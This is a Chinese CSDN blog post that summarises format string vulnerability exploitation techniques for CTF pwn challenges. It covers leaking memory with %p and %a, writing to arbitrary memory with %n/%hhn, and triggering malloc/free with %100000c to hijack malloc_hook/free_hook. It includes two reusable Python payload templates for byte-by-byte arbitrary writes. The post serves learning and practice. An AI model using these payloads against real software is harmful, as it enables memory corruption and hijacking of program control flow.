[干货]格式化字符串漏洞(fsb)利用方式总结 附攻击模板

最新推荐文章于 2023-12-13 11:29:41 发布
最新推荐文章于 2023-12-13 11:29:41 发布
阅读量1.3k 收藏 5
点赞数
分类专栏: 知识总结 pwn CTF 文章标签: 格式化字符串 printf 任意写 内存泄漏 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SmalOSnail/article/details/105258461
版权
pwn 同时被 3 个专栏收录
35 篇文章 2 订阅
订阅专栏
知识总结
14 篇文章 0 订阅
订阅专栏
CTF
7 篇文章 0 订阅
订阅专栏

printf

著名的格式化字符串漏洞就不说啦~ printf家族的函数都存在这个漏洞

printf, fprintf, dprintf, sprintf, snprintf, vprintf, vfprintf, vdprintf, vsprintf, vsnprintf

常用格式

格式符用途备注
%p以指针格式输出栈中变量的地址$用于指定位置参数,e.g.%13$p
%s输出栈中指针指向的字符串若指针不合法则输出(nil)
%a以double格式输出栈中变量常见于printf_chk泄漏libc,详见#1
%c以char格式输出栈中变量打印过多字符将调用malloc,详见#2
%n将已输出的字符数保存到栈中指针若指针不合法则报错
%n-4字节; %hn-2字节; %hhn-1字节

泄漏内存

%p用于泄漏内存就不多说了

%a的时候要注意一下输出格式的问题,比如有如下输出:

0x0.07fcf47895ap-1022

由于是小数的形式打印的,变量末尾的0会被自动省略掉,需要手动还原一下:

0x07fcf4789500

任意写

case1: buf足够大

如果buf足够大,可以考虑同时使用多个格式符,一次完成变量的修改。

下面是keer师傅的%hhn大法可以快速完成任意写,payload长度至少为128

def fmt(data,addr,off):
    arg0=(data)&0xff
    arg1=(data&0xff00)>>8
    arg2=(data&0xff0000)>>16
    arg3=(data&0xff000000)>>24
    arg4=(data&0xff00000000)>>32
    arg5=(data&0xff0000000000)>>40
    print arg0,arg1,arg2,arg3
    # arg6=(data&0xf f000000000000)>>48
    # arg7=(data&0xf f00000000000000)>>56
    pay1='%'+str(arg0)+'c%'+str(off+10)+'$hhn'
    pay2='%'+str( (arg1-arg0+0x100)%0x100)+'c%'+str(off+11)+'$hhn'
    pay3='%'+str( (arg2-arg1+0x100)%0x100)+'c%'+str(off+12)+'$hhn'
    pay4='%'+str( (arg3-arg2+0x100)%0x100)+'c%'+str(off+13)+'$hhn'
    pay5='%'+str( (arg4-arg3+0x100)%0x100)+'c%'+str(off+14)+'$hhn'
    pay6='%'+str( (arg5-arg4+0x100)%0x100)+'c%'+str(off+15)+'$hhn'
    payload = pay1+pay2+pay3+pay4+pay5+pay6 # +'%100000c'
    payload = payload.ljust(8*10,'A')
    payload+= p64(addr)
    payload+= p64(addr+1)
    payload+= p64(addr+2)
    payload+= p64(addr+3)
    payload+= p64(addr+4)
    payload+= p64(addr+5)
    return payload

%hhn一次写1个字节,相当于是byte/char型,最大范围是0xff,所以(arg1-arg0+0x100)%0x100这样的溢出写法,可以在不排序的情况下准确覆盖变量。

由于每次只改1字节,使用%hhn快速完成任意写,不足之处就是payload太长。

case2: buf不够大

如果buf长度不够,可以考虑重复利用printf,多次攻击完成变量的修改。

下面是藕自己写的模板,payload长度最少是32字节:

def alter_byte(addr,data):
    if data==0:
        payload = "%10$hhn"
    else:
        payload = "%%%dc%%10$hhn"%(data)
    payload = payload.ljust(24,'T')
    payload += p64(addr)
    sl(payload)
    return rc()

def alter_dw(addr,data):
    alter_byte(addr,data&0xff)
    alter_byte(addr+1,(data>>8)&0xff)
    alter_byte(addr+2,(data>>16)&0xff)
    alter_byte(addr+3,(data>>24)&0xff)

def alter_qw(addr,data):
    alter_dw(addr,data)
    alter_dw(addr+4,data>>32)

其中10是offset,用的时候改一下

触发malloc/free

%100000c表示在输出字符时向左侧填充空格,最终输出长度为100000的字符串。当字符串长度过大的时候,printf内部将调用malloc申请空间作为缓冲器,输出结束后会free掉这片空间。

利用方式:

  • 篡改malloc_hook/free_hook,使用%100000c触发malloc/free,劫持程序控制流
  • 和堆相关利用结合,利用printf隐试调用malloc

此外,从原理上看%100000s,%10000d等类似格式也可达到同样效果。

练习题

更新日期:2020年 04月 01日 星期三 23:05:56 CST

TaQini852
关注
专栏目录
【Python从入门到精通】(九)Python中字符串的各种骚操作你已经烂熟于心了么?【收藏下来就挺好的】
码农飞哥
07-11 18万+
字符串的使用烂熟于心总是不错的
[SEEDLab]格式化字符串攻击(format string vulnerability)
HananoYousei的博客
06-09 5665
[SEEDLab]格式化字符串漏洞(Format String Vulnerability) 实验PDF链接 Introduction 格式化字符串漏洞是一个经典的漏洞,也是Pwn里面一个基础吧。他是由于C语言中的printf相关的函数导致的。printf相比大家都已熟悉,对于下面这个语句: printf("%d%d%d", a, b, c); 系统会将"%d%d%d"和后面的a, b, c三个...
字符串攻击、防攻击、实体类、数据访问类
weixin_30328063的博客
11-29 94
字符串攻击: 主要利用获取需用户输入的字符串时,通过输入精心编制的含有某种指令的字符串,从而对数据库进行攻击性操作。 防攻击: 例 cmd.CommandText = "update Users set PassWord=@pwd,NickName=@nick,Sex=@sex,Birthday=@bir,Nation=@nation,Class...
格式化字符串漏洞利用 五、爆破
weixin_34399060的博客
04-14 154
五、爆破 原文:Exploiting Format String Vulnerabilities 作者:scut@team-teso.net 译者:飞龙 日期:2001.9.1 版本:v1.2 当利用这种漏洞,例如缓冲区溢出或者格...
攻防世界新手pwn题:CGfsb格式化字符串漏洞)初解
qq_35066257的博客
09-25 842
攻防世界新手pwn题:CGfsb格式化字符串漏洞)初解 在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/ 这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子 ...
pwn - 格式化字符串攻击
Schwarzer
07-22 2025
前言 日前入门pwn,粗浅学习了shellcode,rop,栈溢出攻击,后面遇到了fmtstr,把我头搞炸了,决定好好学习一下
格式化字符串漏洞攻击
从来不在调
03-20 2423
格式化字符串漏洞攻击,主要有以下三点。 1 拒绝服务攻击 2 查看内存攻击 3 任意内存攻击 我们这要说一下危害最大的任何入内存攻击。 注意:最新版的Linux,先关闭地址随机化保护和利用GCC 编译时打开-z execstack 代码如下: 如大家所见,我把存在漏洞的函数规定为折构函数(程序结束后,协助程序完成一些期望的工作),这样子的化,我们不到那可以重内存,还可以执
python三种方式访问字符串中的值
aGang_Gg的博客
05-17 4484
满满的干货,请君检阅。 1、使用「 索引下标」 访问,下标从[0]开始 不解释,看例子 >>> str_1="badianganghuo" >>> print(str_1[0]) b >>> print(str_1[9]) g ​ >>> str="扒点刚货" >>> print(str[0]) 扒 >>> print(str[3]) 货 2、使用「 切片」 操作 示例:[start:stop:st
python字符串变量拼接有空格_这里是最全面的 python 字符串拼接总结
weixin_28864057的博客
01-14 5079
在 Python 中字符串连接有多种方式,这里简单做个总结,应该是比较全面的了,方便以后查阅。加号连接第一种,通过+号的形式:>>> a, b ='hello',' world'>>> a + b'hello world'逗号连接第二种,通过,逗号的形式:>>> a, b ='hello',' world'>>> print(...
用一行Python代码实现按字符串内数字大小排列字符串顺序
weixin_55551408的博客
04-20 2583
大家好,我是Python之眼。 今天给大家带来一篇干货! 熟悉编程的朋友应该不难理解,为什么字符串排序"10"会排在"2"的前面。因为字符串大小比较是对各字符的编码值逐个进行比较,"1"<"2",所以"10"<"2"。 不过这不是本文想要达到的目标,本篇文章会用一行代码,让文本中出现的(任意多组)数字序号可以按照数字顺序进行排序。 目录: 〇、背景 一、正则取出序号位置进行排序 二、微软的排序策略 三、Python实现排序 四、一行代码排序 〇、背景 最近在爬虫某漫画网站
Java 手动解析不带引号的JSON字符串的操作
weixin_51495453的博客
03-19 5087
1 需求说明 项目中遇到了一批不带引号的类JSON格式字符串: {Name:Heal,Age:20,Tag:[Coding,Reading]} 需要将其解析成JSON对象, 然后插入到Elasticsearch中, 当作Object类型的对象存储起来. 在对比了阿里的FastJson、Google的Gson, 没找到想要的功能 ( 可能是博主不够仔细, 有了解的童学留言告诉我下呀????), 于是就自己了个工具类, 用来实现此需求. 如果是带有引号的标准JSON字符串, 可直接通过上述2种工具进行解析,
FSB音频文件解码
12-14
该工具是本人找到的可以解压出.fsb文件中的wav音频的软件,并且解压出即可播放。工具目录不能有中文,使用时用把fsb文件拖动以fsb_aud_extr.exe打开即可。
格式化字符串漏洞利用
04-14
格式化字符串漏洞利用
arg是什么函数_什么是格式化字符串攻击
weixin_39850143的博客
11-26 225
黑客笔记 本期live互动、答疑相关问题归档(有视频):直播期间“升级难度”部分未能复现漏洞的原因:1.由于昨晚关闭了电脑,导致今天开机之后,系统环境发生了变化.2.昨晚的%08x出现的位置是第7个,今天的环境%08x出现的位置是第10个.3.修改一下user_input的%08x的数量,就可以复现该漏洞了.如下:将0x44改成0x56. [04/14/2018 22:04] seed@ubunt...
格式化字符串攻击原理及示例
么刚的专栏
10-23 1万+
printf函数实现原理;格式化字符串攻击原理及示例
雪城大学信息安全讲义 七、格式化字符串漏洞
热门推荐
龙哥盟
04-22 3万+
七、格式化字符串漏洞 原文:Format String Vulnerability 译者:飞龙 printf ( user_input );上面的代码在 C 程序中十分常见。这一章中,我们会发现如果程序使用权限运行(例如 Set-UID 程序),可能造成什么问题。1 格式化字符串 什么是格式化字符串printf ("The magic number is: %d\n", 1911);
FMOD Core API 指南
最新发布
申徒嘉的专栏
12-13 377
FMOD Core API 是一个程序员API,旨在涵盖声音的基础/原语。这包括'Channels''Sounds''DSP'以及3D声音和闭包等概念。它是独立的,不需要任何声音设计工具的接口。这些特性都是由程序员用代码实现的。
fsb,fev文件格式转换,提取与打包
tiandyoin的专栏
04-13 3万+
发现有很多朋友和我一样,虽然下载涂装站上别人制作好的音乐包,但是里面不完全是自己喜欢的音乐,就想制作一个真正自己喜爱的音乐包,用了一天看了很多相关帖子,我才弄明白怎么做,但我觉帖子上面说得确实不是很好理解,所以我把我的实验结果分享给大家!希望能帮助到和我有一样想法的朋友们!注意一定先备份坦克世界\res\audio\文件夹,如果不喜欢了还可以还原回来。(我有几幅图是借用一些帖子上的原图)) _/
C#string 字符串处理
08-16
在C#中处理字符串可以使用多种方法,以下是几种常见的方法: 方法一:使用字符串的内置方法 可以使用字符串的内置方法来处理字符串,例如使用Contains()方法来检查字符串是否包含某个指定的子字符串,使用Replace()方法来替换字符串中的指定字符或子字符串。可以使用Substring()方法来获取字符串的子串。还可以使用Split()方法将字符串拆分成数组,使用Join()方法将数组拼接成字符串。 方法二:使用正则表达式 正则表达式是一种强大的字符串处理工具。可以使用正则表达式来匹配、查找、替换字符串中的特定模式。C#中提供了Regex类来操作正则表达式。 方法三:使用StringBuilder类 如果需要对字符串做大量的修改操作,可以使用StringBuilder类。StringBuilder类提供了一组方法来对字符串进行添加、删除、替换等操作。与字符串不同,StringBuilder对象可以直接修改,而不会创建新的字符串对象。 方法四:使用字符串格式化 在C#中,可以使用字符串格式化来对字符串进行处理。可以使用String.Format()方法或者使用插值表达式($)来将变量或表达式插入到字符串中。 总结:C#中有多种方法可以处理字符串,可以根据具体需求选择合适的方法。可以使用字符串的内置方法、正则表达式、StringBuilder类或者字符串格式化来对字符串进行处理。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [C#字符串(string)操作](https://blog.csdn.net/caoyanchao1/article/details/121547036)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [C# string字符串内存管理深入分析(全程干货)](https://blog.csdn.net/qq_52855744/article/details/126738039)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TaQini852

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值